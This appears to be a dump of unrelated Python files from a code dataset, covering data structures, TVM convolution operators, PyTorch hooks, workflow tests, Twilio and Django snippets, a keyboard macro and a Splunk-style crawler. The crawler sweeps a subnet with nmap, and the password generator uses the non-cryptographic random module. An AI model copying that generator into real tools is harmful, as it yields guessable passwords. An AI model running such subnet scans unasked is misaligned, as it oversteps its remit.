self.q2 = []
# @param x, an integer
# @return nothing
def push(self, x):
self.q1.append(x)
# @return nothing
def pop(self):
if self.q2:
self.q2.pop()
else:
while True:
try:
item = self.q1.pop()
except:
break
else:
self.q2.append(item)
self.q2.pop()
# @return an integer
def peek(self):
if self.q2:
return self.q2[-1]
else:
while True:
try:
item = self.q1.pop()
except:
break
else:
self.q2.append(item)
return self.q2[-1]
# @return an boolean
def empty(self):
return (not self.q1) and (not self.q2)
| StarcoderdataPython |
17040 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-variable, unused-argument
"""Transposed 2D convolution operators (sometimes called Deconvolution)."""
import collections
import tvm
from tvm import relay, te
from ..utils import simplify
from .dilate import dilate
from .pad import pad
from .utils import get_pad_tuple
def _ntuple(n):
def parse(x):
if isinstance(x, collections.abc.Iterable):
assert len(x) == n, f"Input can only have {n} elements, but got {len(x)} instead: {x}."
return x
return tuple(repeat(x, n))
return parse
_single = _ntuple(1)
_pair = _ntuple(2)
_triple = _ntuple(3)
_quadruple = _ntuple(4)
def conv2d_transpose_nchw(Input, Filter, strides, padding, out_dtype, output_padding):
"""Transposed 2D convolution nchw forward operator.
Parameters
----------
Input : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
Filter : tvm.te.Tensor
4-D with shape [in_channel, num_filter, filter_height, filter_width]
strides : tuple of two ints
The spatial stride along height and width
padding : int or str
Padding size, or ['VALID', 'SAME']
out_dtype : str
The output data type. This is used for mixed precision.
output_padding : tuple of ints
Used to get the right output shape for gradients
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
return declaration_conv2d_transpose_impl(
Input, Filter, strides, padding, out_dtype, output_padding=output_padding
)
def conv2d_transpose_nchw_preprocess(data, kernel, strides, padding, out_dtype, output_padding):
"""Preprocess data and kernel to make the compute pattern
of conv2d_transpose the same as conv2d"""
batch, in_c, in_h, in_w = data.shape
_, out_c, filter_h, filter_w = kernel.shape
stride_h, stride_w = strides
opad_h, opad_w = output_padding
assert opad_h < stride_h and opad_w < stride_w
# dilate data
data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
# pad data
fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
bpad_top = filter_h - 1 - fpad_top
bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
bpad_left = filter_w - 1 - fpad_left
bpad_right = filter_w - 1 - fpad_right + opad_w
data_pad = pad(
data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
)
# transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
kernel_transform = te.compute(
(out_c, in_c, filter_h, filter_w),
lambda o, i, h, w: kernel[i][o][filter_h - 1 - h][filter_w - 1 - w],
name="kernel_transform",
)
return data_pad, kernel_transform
def declaration_conv2d_transpose_impl(data, kernel, strides, padding, out_dtype, output_padding):
"""Implementation of conv2d transpose"""
data_pad, kernel_transform = conv2d_transpose_nchw_preprocess(
data, kernel, strides, padding, out_dtype, output_padding
)
batch, in_c, in_h, in_w = data_pad.shape
out_c, _, filter_h, filter_w = kernel_transform.shape
# convolution stage
out_c = simplify(out_c)
out_h = simplify(in_h - filter_h + 1)
out_w = simplify(in_w - filter_w + 1)
dc = te.reduce_axis((0, in_c), name="dc")
dh = te.reduce_axis((0, filter_h), name="dh")
dw = te.reduce_axis((0, filter_w), name="dw")
Output = te.compute(
(batch, out_c, out_h, out_w),
lambda b, c, h, w: te.sum(
data_pad[b, dc, h + dh, w + dw].astype(out_dtype)
* kernel_transform[c, dc, dh, dw].astype(out_dtype),
axis=[dc, dh, dw],
),
tag="conv2d_transpose_nchw",
)
return Output
def group_conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding, groups):
"""Group convolution operator in NCHW layout.
Parameters
----------
data : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
kernel : tvm.te.Tensor
4-D with shape [in_channel, out_channel // groups, filter_height, filter_width]
stride : int or a list/tuple of two ints
Stride size, or [stride_height, stride_width]
padding : int or a list/tuple of 2 or 4 ints
padding size, or
[pad_height, pad_width] for 2 ints, or
[pad_top, pad_left, pad_bottom, pad_right] for 4 ints
out_dtype : str
The output data type. This is used for mixed precision.
output_padding : tuple of ints
Used to get the right output shape for gradients
groups : int
number of groups
out_dtype : str
The output type. This is used for mixed precision.
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
if groups == 1:
return conv2d_transpose_nchw(data, kernel, stride, padding, out_dtype, output_padding)
# some pre-processing and prelimnary checks
if out_dtype is None:
out_dtype = data.dtype
batch, in_channels, in_h, in_w = data.shape
_, out_c, filter_h, filter_w = kernel.shape
assert (
in_channels % groups == 0
), f"input channels {in_channels} must divide group size {groups}"
# assert out_c % groups == 0, f"output channels {in_c} must divide group size {groups}"
strides = _pair(stride)
# padding = _pair(padding)
# output_padding = _pair(output_padding)
# dilation = _pair(dilation)
stride_h, stride_w = strides
opad_h, opad_w = output_padding
assert (
opad_h < stride_h and opad_w < stride_w
), f"[{output_padding}] opad_h:{opad_h} < stride_h:{stride_h} \
and opad_w:{opad_w} < stride_w:{stride_w} does not satisfy."
# dilate data
data_dilate = dilate(data, [1, 1, stride_h, stride_w], name="data_dilate")
# pad data
fpad_top, fpad_left, fpad_bottom, fpad_right = get_pad_tuple(padding, (filter_h, filter_w))
bpad_top = filter_h - 1 - fpad_top
bpad_bottom = filter_h - 1 - fpad_bottom + opad_h
bpad_left = filter_w - 1 - fpad_left
bpad_right = filter_w - 1 - fpad_right + opad_w
data_pad = pad(
data_dilate, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right], name="data_pad"
)
# transform kernel layout from IOHW to OIHW, and rotate kernel by 180 degrees
kernel_transform = te.compute(
(out_c, in_channels, filter_h, filter_w),
lambda i, o, h, w: kernel[o][i][filter_h - 1 - h][filter_w - 1 - w],
name="kernel_transform",
)
batch, in_channels, in_h, in_w = data_pad.shape
out_c, _, filter_h, filter_w = kernel_transform.shape
# convolution stage
out_channels = simplify(out_c * groups)
out_h = simplify(in_h - filter_h + 1)
out_w = simplify(in_w - filter_w + 1)
dc = te.reduce_axis((0, in_channels // groups), name="dc")
dh = te.reduce_axis((0, filter_h), name="dh")
dw = te.reduce_axis((0, filter_w), name="dw")
# data: batch, in_channels, out_h, out_w
# weight: out_channels // G, in_channels, out_h, out_w
return te.compute(
(batch, out_channels, out_h, out_w),
lambda b, c, h, w: te.sum(
data_pad[
b, c // (out_channels // groups) * (in_channels // groups) + dc, h + dh, w + dw
].astype(out_dtype)
* kernel_transform[
c % (out_channels // groups),
c // (out_channels // groups) * (in_channels // groups) + dc,
dh,
dw,
].astype(out_dtype),
axis=[dc, dh, dw],
),
tag="group_conv2d_transpose_nchw",
)
def layout_transform(tensor: "relay.Expr", current_layout: str, desired_layout: str):
"""Transform a tensor with the current layout to the desired layout.
E.g. layout_transform(t, "NCHW", "CNHW") --> relay.transpose(t, [1, 0, 2, 3])
Parameters
----------
tensor: relay.Expr
The Tensor to transpose
current_layout: str
The current layout e.g. NCHW or OIHW
desired_layout: str
The desired layout, must be compatible with current_layout
Returns
-------
The layout_transformed tensor.
"""
if sorted(current_layout) != sorted(desired_layout):
raise ValueError(f"Incompatible layouts: {current_layout} vs {desired_layout}")
if current_layout == desired_layout:
return tensor
current_layout_map = {c: i for i, c in enumerate(current_layout)}
desired_layout_map = {c: i for i, c in enumerate(desired_layout)}
axes = [None] * len(current_layout)
for c, i in desired_layout_map.items():
axes[i] = current_layout_map[c]
return relay.transpose(tensor, axes=axes)
@tvm.target.generic_func
def conv2d_transpose_legalize(attrs, inputs, types):
"""Legalizes Transposed 2D convolution op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current Transposed 2D convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
data, kernel = inputs
kernel_layout = attrs["kernel_layout"]
if attrs["data_layout"] == "NHWC":
kernel = layout_transform(kernel, kernel_layout, "IOHW")
# Set new attrs for conv2d_transpose.
new_attrs = {k: attrs[k] for k in attrs.keys()}
new_attrs["data_layout"] = "NCHW"
# layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
new_attrs["kernel_layout"] = "IOHW"
# Convert data to NCHW.
data = relay.transpose(data, axes=(0, 3, 1, 2))
deconv = relay.nn.conv2d_transpose(data, kernel, **new_attrs)
# Convert back to original NHWC layout.
out = relay.transpose(deconv, axes=(0, 2, 3, 1))
return out
if attrs["data_layout"] == "NCHW":
kernel = layout_transform(kernel, kernel_layout, "IOHW")
new_attrs = {k: attrs[k] for k in attrs.keys()}
# layout of kernel should be IOHW, but kernel_layout will be swapped - OIHW
new_attrs["kernel_layout"] = "IOHW"
return relay.nn.conv2d_transpose(data, kernel, **new_attrs)
return None
| StarcoderdataPython |
1830329 | <gh_stars>10-100
import os
from openpyxl import load_workbook
entity_database_path = os.path.join("/Users/FabianFalck/Documents/[03]PotiticalCompass_PAPER/SPC/Paper/Code/Data_pipe", "entities_without_duplicates.xlsx")
newspaper_database_path = os.path.join("/Users/FabianFalck/Documents/[03]PotiticalCompass_PAPER/SPC/Paper/Code/Data_pipe", "newspaper_database.xlsx")
def retrieve_entities(only_search_terms):
"""
Extracts all entities in the worksheet database into a list of strings.
:return: Entities as list of strings
"""
wb = load_workbook(filename=entity_database_path)
sheet = wb['Paper']
# get all entities in the worksheet
entity_cells = sheet['A2:A' + str(sheet.max_row)] # 2, since row 1 is column name
entities = [str(cell[0].value) for cell in entity_cells] # strange tuple in tuple
# get the column search term
search_term_cells = sheet['D2:D' + str(sheet.max_row)] # 2, since row 1 is column name
search_terms = [cell[0].value for cell in search_term_cells] # strange tuple in tuple
# get the column importance
importance_cells = sheet['E2:E' + str(sheet.max_row)] # 2, since row 1 is column name
importance_terms = [cell[0].value for cell in importance_cells] # strange tuple in tuple
# print(type(search_terms[0]))
# print(search_terms[0])
print("before search_terms: ", len(entities))
# get only those entities that have search_term set to 1
if only_search_terms:
entities = [entity for i, entity in enumerate(entities) if search_terms[i] == 1]
importances = [importance for i, importance in enumerate(importance_terms) if search_terms[i] == 1]
elif not only_search_terms:
entities = [entity for i, entity in enumerate(entities) if search_terms[i] == 0]
importances = [importance for i, importance in enumerate(importance_terms) if search_terms[i] == 0]
print("after search_terms: ", len(entities))
# print("before unique: ", len(entities)) # TODO deprecated: duplicates removed in excel
# get only unique entities (only process them once)
# entities = set(entities)
# entities = list(entities)
# print("after unique: ", len(entities))
print("number of entities as search terms: ", len(entities)) # should be ~ 1050 with all search terms
print("number of importances as search terms: ", len(importances))
assert len(entities) == len(importances)
return entities, importances
def retrieve_newspaper_domains():
"""
Extracts all newspaper domains in the worksheet database into a list of strings.
:return: newspaper domains as list of strings
"""
wb = load_workbook(filename=newspaper_database_path)
sheet = wb['Sheet1']
newspaper_cells = sheet['A2:A' + str(sheet.max_row)] # 2, since row 1 is column name
newspapers = [str(cell[0].value) for cell in newspaper_cells] # strange tuple in tuple
print("number of newspapers: ", len(newspapers))
return newspapers
if __name__ == "__main__":
print(retrieve_entities(only_search_terms=True))
print(retrieve_newspaper_domains()) | StarcoderdataPython |
3506008 | """PyTorch utilities for the UC Irvine course on
'ML & Statistics for Physicists'
"""
import functools
import copy
import numpy as np
import torch.nn
def sizes_as_string(tensors):
if isinstance(tensors, torch.Tensor):
return str(tuple(tensors.size()))
else:
return ', '.join([sizes_as_string(T) for T in tensors])
def trace_forward(module, input, output, name='', verbose=False):
"""Implement the module forward hook API.
Parameters
----------
input : tuple or tensor
Input tensor(s) to this module. We save a detached
copy to this module's `input` attribute.
output : tuple or tensor
Output tensor(s) to this module. We save a detached
copy to this module's `output` attribute.
"""
if isinstance(input, tuple):
module.input = [I.detach() for I in input]
if len(module.input) == 1:
module.input = module.input[0]
else:
module.input = input.detach()
if isinstance(output, tuple):
module.output = tuple([O.detach() for O in output])
if len(module.output) == 1:
module.output = module.output[0]
else:
module.output = output.detach()
if verbose:
print(f'{name}: IN {sizes_as_string(module.input)} OUT {sizes_as_string(module.output)}')
def trace_backward(module, grad_in, grad_out, name='', verbose=False):
"""Implement the module backward hook API.
Parameters
----------
grad_in : tuple or tensor
Gradient tensor(s) for each input to this module.
These are the *outputs* from backwards propagation and we
ignore them.
grad_out : tuple or tensor
Gradient tensor(s) for each output to this module.
Theser are the *inputs* to backwards propagation and
we save detached views to the module's `grad` attribute.
If grad_out is a tuple with only one entry, which is usually
the case, save the tensor directly.
"""
if isinstance(grad_out, tuple):
module.grad = tuple([O.detach() for O in grad_out])
if len(module.grad) == 1:
module.grad = module.grad[0]
else:
module.grad = grad_out.detach()
if verbose:
print(f'{name}: GRAD {sizes_as_string(module.grad)}')
def trace(module, active=True, verbose=False):
if hasattr(module, '_trace_hooks'):
# Remove all previous tracing hooks.
for hook in module._trace_hooks:
hook.remove()
if not active:
return
module._trace_hooks = []
for name, submodule in module.named_modules():
if submodule is module:
continue
module._trace_hooks.append(submodule.register_forward_hook(
functools.partial(trace_forward, name=name, verbose=verbose)))
module._trace_hooks.append(submodule.register_backward_hook(
functools.partial(trace_backward, name=name, verbose=verbose)))
def get_lr(self, name='lr'):
lr_grps = [grp for grp in self.param_groups if name in grp]
if not lr_grps:
raise ValueError(f'Optimizer has no parameter called "{name}".')
if len(lr_grps) > 1:
raise ValueError(f'Optimizer has multiple parameters called "{name}".')
return lr_grps[0][name]
def set_lr(self, value, name='lr'):
lr_grps = [grp for grp in self.param_groups if name in grp]
if not lr_grps:
raise ValueError(f'Optimizer has no parameter called "{name}".')
if len(lr_grps) > 1:
raise ValueError(f'Optimizer has multiple parameters called "{name}".')
lr_grps[0][name] = value
# Add get_lr, set_lr methods to all Optimizer subclasses.
torch.optim.Optimizer.get_lr = get_lr
torch.optim.Optimizer.set_lr = set_lr
def lr_scan(loader, model, loss_fn, optimizer, lr_start=1e-6, lr_stop=1., lr_steps=100):
"""Implement the learning-rate scan described in Smith 2015.
"""
import matplotlib.pyplot as plt
# Save the model and optimizer states before scanning.
model_save = copy.deepcopy(model.state_dict())
optim_save = copy.deepcopy(optimizer.state_dict())
# Schedule learning rate to increase in logarithmic steps.
lr_schedule = np.logspace(np.log10(lr_start), np.log10(lr_stop), lr_steps)
model.train()
losses = []
scanning = True
while scanning:
for x_in, y_tgt in loader:
optimizer.set_lr(lr_schedule[len(losses)])
y_pred = model(x_in)
loss = loss_fn(y_pred, y_tgt)
losses.append(loss.data)
if len(losses) == lr_steps or losses[-1] > 10 * losses[0]:
scanning = False
break
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Restore the model and optimizer state.
model.load_state_dict(model_save)
optimizer.load_state_dict(optim_save)
# Plot the scan results.
plt.plot(lr_schedule[:len(losses)], losses, '.')
plt.ylim(0.5 * np.min(losses), 10 * losses[0])
plt.yscale('log')
plt.xscale('log')
plt.xlabel('Learning rate')
plt.ylabel('Loss')
# Return an optimizer with set_lr/get_lr methods, and lr set to half of the best value found.
idx = np.argmin(losses)
lr_set = 0.5 * lr_schedule[idx]
print(f'Recommended lr={lr_set:.3g}.')
optimizer.set_lr(lr_set)
| StarcoderdataPython |
5149884 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import os
import time
import shutil
from ai_flow import AIFlowServerRunner, init_ai_flow_context
from ai_flow.workflow.status import Status
from ai_flow_plugins.job_plugins import flink
from test_flink_processor import Source, Sink, Transformer, Transformer2
import ai_flow as af
project_path = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
class TestFlink(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
config_file = project_path + '/master.yaml'
cls.master = AIFlowServerRunner(config_file=config_file)
cls.master.start()
@classmethod
def tearDownClass(cls) -> None:
cls.master.stop()
generated = '{}/generated'.format(project_path)
if os.path.exists(generated):
shutil.rmtree(generated)
temp = '{}/temp'.format(project_path)
if os.path.exists(temp):
shutil.rmtree(temp)
def setUp(self):
self.master._clear_db()
af.current_graph().clear_graph()
init_ai_flow_context()
def tearDown(self):
self.master._clear_db()
def test_local_flink_task(self):
with af.job_config('task_1'):
input_example = af.user_define_operation(processor=Source())
processed = af.transform(input=[input_example], transform_processor=Transformer())
af.user_define_operation(input=[processed], processor=Sink())
w = af.workflow_operation.submit_workflow(workflow_name=af.current_workflow_config().workflow_name)
je = af.workflow_operation.start_job_execution(job_name='task_1', execution_id='1')
je = af.workflow_operation.get_job_execution(job_name='task_1', execution_id='1')
self.assertEqual(Status.FINISHED, je.status)
def test_stop_local_flink_task(self):
with af.job_config('task_1'):
input_example = af.user_define_operation(processor=Source())
processed = af.transform(input=[input_example], transform_processor=Transformer2())
af.user_define_operation(input=[processed], processor=Sink())
w = af.workflow_operation.submit_workflow(workflow_name='test_python')
je = af.workflow_operation.start_job_execution(job_name='task_1', execution_id='1')
time.sleep(2)
af.workflow_operation.stop_job_execution(job_name='task_1', execution_id='1')
je = af.workflow_operation.get_job_execution(job_name='task_1', execution_id='1')
self.assertEqual(Status.FAILED, je.status)
self.assertTrue('err' in je.properties)
@unittest.skip("need start flink cluster")
def test_cluster_flink_task(self):
with af.job_config('task_2'):
input_example = af.user_define_operation(processor=Source())
processed = af.transform(input=[input_example], transform_processor=Transformer())
af.user_define_operation(input=[processed], processor=Sink())
w = af.workflow_operation.submit_workflow(workflow_name=af.current_workflow_config().workflow_name)
je = af.workflow_operation.start_job_execution(job_name='task_2', execution_id='1')
je = af.workflow_operation.get_job_execution(job_name='task_2', execution_id='1')
self.assertEqual(Status.FINISHED, je.status)
@unittest.skip("need start flink cluster")
def test_cluster_stop_local_flink_task(self):
with af.job_config('task_2'):
input_example = af.user_define_operation(processor=Source())
processed = af.transform(input=[input_example], transform_processor=Transformer2())
af.user_define_operation(input=[processed], processor=Sink())
w = af.workflow_operation.submit_workflow(workflow_name='test_python')
je = af.workflow_operation.start_job_execution(job_name='task_2', execution_id='1')
time.sleep(20)
af.workflow_operation.stop_job_execution(job_name='task_2', execution_id='1')
je = af.workflow_operation.get_job_execution(job_name='task_2', execution_id='1')
self.assertEqual(Status.FAILED, je.status)
self.assertTrue('err' in je.properties)
@unittest.skip("need start flink cluster")
def test_cluster_flink_java_task(self):
flink_home = os.environ.get('FLINK_HOME')
word_count_jar = os.path.join(flink_home, 'examples', 'batch', 'WordCount.jar')
output_file = os.path.join(flink_home, 'log', 'output')
if os.path.exists(output_file):
os.remove(output_file)
jar_dir = os.path.join(project_path, 'dependencies', 'jar')
if not os.path.exists(jar_dir):
os.makedirs(jar_dir)
shutil.copy(word_count_jar, jar_dir)
args = ['--input', os.path.join(flink_home, 'conf', 'flink-conf.yaml'), '--output', output_file]
with af.job_config('task_2'):
af.user_define_operation(processor=flink.FlinkJavaProcessor(entry_class=None,
main_jar_file='WordCount.jar',
args=args))
w = af.workflow_operation.submit_workflow(workflow_name=af.current_workflow_config().workflow_name)
je = af.workflow_operation.start_job_execution(job_name='task_2', execution_id='1')
je = af.workflow_operation.get_job_execution(job_name='task_2', execution_id='1')
self.assertEqual(Status.FINISHED, je.status)
dep_dir = os.path.join(project_path, 'dependencies')
if os.path.exists(dep_dir):
shutil.rmtree(dep_dir)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
5045181 | <gh_stars>0
# standard libary
import threading
# term ticker
import commands
import tools.rss_tools as rss_tools
import tools.twitter_tools as twitter_tools
class TermTickerThreadManager():
"""
"""
def __init__(self, termticker_dict):
self.window_dict = {
'monitor' : 'monitor_thread',
'rss' : 'rss_thread',
'twitter' : 'twitter_thread'
}
self.functions_dict = {
'monitor_thread': '',
'rss_thread' : rss_tools.rss_feed,
'twitter_thread': twitter_tools.twitter_feed
}
self.commands_dict = {
'alive' : self.call_check_thread,
'exit' : self.call_exit_thread
}
self.threads = {}
self.termticker_dict = termticker_dict
### Utility commands
def add_thread(self, name):
thread = threading.Thread(name = name,
target = self.functions_dict[name],
kwargs = self.termticker_dict)
thread.daemon = True
thread.start()
self.threads[name] = thread
def check_thread(self, window_name):
return self.threads[self.window_dict[window_name]].is_alive()
def exit_thread(self, window_name):
if not self.check_thread(window_name):
self.threads[window_dict[window_name]].exit()
### Callable Commands
def call_check_thread(self, window_key, command_key, args):
if self.check_thread(window_key):
is_alive = 'alive'
else:
is_alive = 'not alive'
commands.print_warning(self.termticker_dict['input_window'],
'Thread is ' + is_alive + '. Press ' + \
'any key to continue.')
def call_exit_thread(self, window_key, command_key, args):
self.exit_thread(window_key)
commands.print_warning(self.termticker_dict['input_window'],
window_key + ' thread has been killed. ' + \
'Press any key to continue.')
| StarcoderdataPython |
3388134 | # Download the Python helper library from twilio.com/docs/python/install
from twilio.rest import TwilioTaskRouterClient
# Your Account Sid and Auth Token from twilio.com/user/account
account_sid = "<KEY>"
auth_token = "<PASSWORD>"
workspace_sid = "WSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
worker_sid = "WKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
reservation_sid = 'WRXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
client = TwilioTaskRouterClient(account_sid, auth_token)
# accept a reservation
reservation = client.workers(workspace_sid) \
.get(worker_sid).reservations \
.update(reservation_sid, reservation_status='accepted')
print(reservation.reservation_status)
print(reservation.worker_name)
| StarcoderdataPython |
12829014 | <gh_stars>0
import wrapt
import logging
from ..utils.event import Eventful
logger = logging.getLogger(__name__)
class OSException(Exception):
pass
@wrapt.decorator
def unimplemented(wrapped, _instance, args, kwargs):
cpu = getattr(getattr(_instance, "parent", None), "current", None)
addr = None if cpu is None else cpu.read_register("PC")
logger.warning(
f"Unimplemented system call%s: %s(%s)",
"" if addr is None else " at " + hex(addr),
wrapped.__name__,
", ".join(hex(a) for a in args),
)
return wrapped(*args, **kwargs)
class SyscallNotImplemented(OSException):
"""
Exception raised when you try to call an unimplemented system call.
Go to linux.py and add it!
"""
def __init__(self, idx, name):
msg = f'Syscall index "{idx}" ({name}) not implemented.'
super().__init__(msg)
class ConcretizeSyscallArgument(OSException):
def __init__(self, reg_num, message="Concretizing syscall argument", policy="SAMPLED"):
self.reg_num = reg_num
self.message = message
self.policy = policy
super().__init__(message)
class Platform(Eventful):
"""
Base class for all platforms e.g. operating systems or virtual machines.
"""
def __init__(self, path, **kwargs):
super().__init__(**kwargs)
def invoke_model(self, model, prefix_args=None):
self._function_abi.invoke(model, prefix_args)
def __setstate__(self, state):
super().__setstate__(state)
def __getstate__(self):
state = super().__getstate__()
return state
def generate_workspace_files(self):
return {}
| StarcoderdataPython |
9747482 | <gh_stars>0
from django.apps import AppConfig
from django.contrib.admin.apps import AdminConfig
class BlogAdminConfig(AdminConfig):
default_site = "blog.admin.BlogAdminArea"
class BlogConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'blog'
| StarcoderdataPython |
3450675 | <filename>Scripts/Miscellaneous/GUI Password Generator/passwordGenerator.py
from tkinter import *
import string
import random
root = Tk()
root.title("Password Generator - By Rohit")
root.geometry("1000x700")
root.wm_iconbitmap("pass.ico")
# Function to generate a password
def generate():
if passLen.get() == 0:
TextArea.insert(1.0, "Please Enter password length.")
else:
TextArea.delete(1.0, END)
if passType.get() == 1:
s1 = string.digits
s = []
s.extend(s1)
random.shuffle(s)
password = "".join(s[0:passLen.get()])
TextArea.insert(1.0, f"Your password is : {password}")
elif passType.get() == 2:
s1 = string.ascii_lowercase
s2 = string.digits
s = []
s.extend(s1)
s.extend(s2)
random.shuffle(s)
password = "".join(s[0:passLen.get()])
TextArea.insert(1.0, f"Your password is : {password}")
elif passType.get() == 3:
s1 = string.ascii_lowercase
s2 = string.ascii_uppercase
s3 = string.digits
s4 = string.punctuation
s = []
s.extend(s1)
s.extend(s2)
s.extend(s3)
s.extend(s4)
random.shuffle(s)
password = "".join(s[0:passLen.get()])
TextArea.insert(1.0, f"Your password is : {password}")
else:
TextArea.insert(1.0, "Invalid Password Type\n")
# Length of password
passLen = IntVar()
passLen.set(0)
passType = IntVar()
Label(root, text="Welcome to Password Generator", font="lucida 20 bold").pack(pady=10)
f1 = Frame(root)
# Label for Enter Password length
l1 = Label(f1, text="Enter password length", font="lucida 10 bold")
l1.grid(row=1, column=3, pady=20)
# Entry widget
e1 = Entry(f1, textvariable=passLen)
e1.grid(row=1, column=5)
# Radiobuttons for password type
r1 = Radiobutton(f1, text="PIN", value=1, variable=passType, padx=10, font="lucida 12").grid(row=2, column=4, )
r2 = Radiobutton(f1, text="AlphaNumeric", value=2, variable=passType, padx=10, font="lucida 12").grid(row=3, column=4)
r3 = Radiobutton(f1, text="Extreme Secure", value=3, variable=passType, padx=10, font="lucida 12").grid(row=4, column=4)
# Submit Button
b1 = Button(f1, text="Submit", command=generate, font="lucida 12")
b1.grid(row=5, column=4, pady=10)
# Textarea to show generated password
TextArea = Text(f1)
TextArea.grid(row=6, column=4)
f1.pack()
root.mainloop() | StarcoderdataPython |
6676783 | import random
import keyboard
import pyautogui
import time
#IMPORT THE HELL OUT OF THE CODE HAHHAHAHAHAHHA
keysss=['up','down','left','right']
#This can be changed according to the emulator settings
def loop():
for x in range(3):
sus=random.choice(keysss)
#sussy
pyautogui.keyDown('x')
#change the x here with whatever key you have for b or running so that you can run and move(saves time lol)
pyautogui.keyDown(sus)
pyautogui.keyUp(sus)
pyautogui.keyUp('x')
def z():
for x in range(4):
pyautogui.keyDown('z')
#Change this to the a key of your emulator i.e. the key that interacts with the env
#You can check the name of keys in pyautogui that work with print(pyautogui.KEY_NAMES)
time.sleep(0.2)
pyautogui.keyDown('z')
pyautogui.keyUp('z')
time.sleep(0.2)
pyautogui.keyUp('z')
time.sleep(3.5)
pyautogui.keyDown('z')
time.sleep(0.2)
pyautogui.keyDown('z')
time.sleep(0.2)
pyautogui.keyUp('z')
time.sleep(0.2)
pyautogui.keyUp('z')
#Change the keys according to ur wish
keyboard.add_hotkey('/',lambda:loop())
keyboard.add_hotkey(',',lambda:z())
input()
| StarcoderdataPython |
6538583 | # Version 4.0
#!/usr/bin/env python
# nmap -p 80,8000,8080,8088 tiny.splunk.com
# nmap -sP -T insane -oG foo mcdavid/24
#
# grepable = -oG
# OS = -O
#
# sudo nmap tiny
# sudo nmap -O tiny/24
# sudo nmap -sX -O tiny
# nmap -v -O tiny
#
import os, time, stat, re, sys, subprocess
import crawl
import logging as logger
NETWORKCMD = "nmap %s/%s"
# !! need to ensure no quotes, spaces, ;, etc. no funny business in command.
def exeCommand(command, input = ""):
logger.info("network crawl = %s" % command)
p = subprocess.Popen(command.split(' '),stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = p.communicate(input + "\n")[0]
return output
class NetworkCrawler(crawl.Crawler):
def __init__(self, mgr, args):
name = args.get("name", "network")
crawl.Crawler.__init__(self, name, mgr, args)
self.network_info = {}
# GET SETTINGS
logger.info("network crawl settings = '%s'" % self.settings)
self.index = self.getSetting("index", "main")
self.host = self.getSetting("host", "localhost")
self.subnet = self.getSetting("subnet", "64")
def execute(self):
# CRAWL
events = self._doCrawl()
# CREATE RESULT ACTIONS
actions = []
for event in events:
event['_time'] = time.time()
event['crawler_type'] = self.name
event['index'] = self.index
actions.append(crawl.AddHostAction(event))
return actions
def _doCrawl(self):
lines = (exeCommand( NETWORKCMD % (self.host, self.subnet) )).split('\n')
events = []
for line in lines:
match = re.match("^(?P<_raw>(?P<portnum>\d+)/(?P<type>\S+)\s+(?P<state>\S+)\s+(?P<service>\S+))$", line)
if match:
events.append(match.groupdict())
return events
| StarcoderdataPython |
6562062 | <reponame>pinkieli/nodepy<gh_stars>0
"""
**Examples**::
>>> import nodepy.linear_multistep_method as lm
>>> ab3=lm.Adams_Bashforth(3)
>>> ab3.order()
3
>>> bdf2=lm.backward_difference_formula(2)
>>> bdf2.order()
2
>>> bdf2.is_zero_stable()
True
>>> bdf7=lm.backward_difference_formula(7)
>>> bdf7.is_zero_stable()
False
>>> bdf3=lm.backward_difference_formula(3)
>>> bdf3.A_alpha_stability()
86
>>> ssp32=lm.elm_ssp2(3)
>>> ssp32.order()
2
>>> ssp32.ssp_coefficient()
1/2
>>> ssp32.plot_stability_region() #doctest: +ELLIPSIS
<matplotlib.figure.Figure object at 0x...>
"""
from __future__ import print_function
from __future__ import absolute_import
import numpy as np
import sympy
import nodepy.snp as snp
from nodepy.general_linear_method import GeneralLinearMethod
from six.moves import map
from six.moves import range
class LinearMultistepMethod(GeneralLinearMethod):
r"""
Implementation of linear multistep methods in the form:
`\alpha_k y_{n+k} + \alpha_{k-1} y_{n+k-1} + ... + \alpha_0 y_n
